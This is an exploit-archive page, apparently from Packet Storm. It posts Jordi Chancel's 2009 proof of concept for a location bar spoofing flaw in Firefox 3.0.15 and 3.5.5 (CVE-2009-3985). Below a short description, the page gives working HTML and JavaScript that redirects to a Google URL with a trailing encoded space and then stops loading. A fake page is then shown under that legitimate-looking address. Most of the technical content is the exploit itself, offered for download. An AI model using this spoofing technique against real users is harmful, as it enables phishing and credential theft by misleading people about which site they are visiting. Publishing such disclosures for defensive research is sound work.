exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Mozilla Firefox Location Bar Spoof

Mozilla Firefox Location Bar Spoof
Posted Dec 18, 2009
Authored by Jordi Chancel

This code demonstrates a location bar spoofing vulnerability in Mozilla Firefox versions 3.0.15 and 3.5.5.

tags | exploit, spoof
SHA-256 | 4385397f27e42e4c553c6cff8fdf2590294d670de21e0ef97651cd60949ff8b3

Mozilla Firefox Location Bar Spoof

Change Mirror Download
<!-----------------------------------------------------------------
Exploit Title: MOZILLA FIREFOX LOCATION BAR SPOOFING VULNERABILITY
Date: 2009-12-18
Author: Jordi Chancel
Software Link: http://www.mozilla.org/security/announce/2009/mfsa2009-69.html
Version: Mozilla Firefox 3.0.15 & 3.5.5
Tested on: Windows XP-VISTA-SEVEN & LINUX BACKTRACK
CVE : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3985
DESCRIPTION: {
Security researcher Jordi Chancel reported an issue similar to one fixed in mfsa2009-44
in which a web page can set document.location to a URL that can't be displayed properly and then inject
content into the resulting blank page. An attacker could use this vulnerability to place a legitimate-looking
but invalid URL in the location bar and inject HTML and JavaScript into the body of the
page, resulting in a spoofing attack. }
Code :
------------------------------------------------------------------------>
<html>
<title>FAKE PAGE</title>
<body onload="javascript:window.location = 'https://www.google.com%20';window.stop();void(0);">
<title>FAKE PAGE</title>
<h1>FAKE PAGE</h1>
<body>
</html>

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close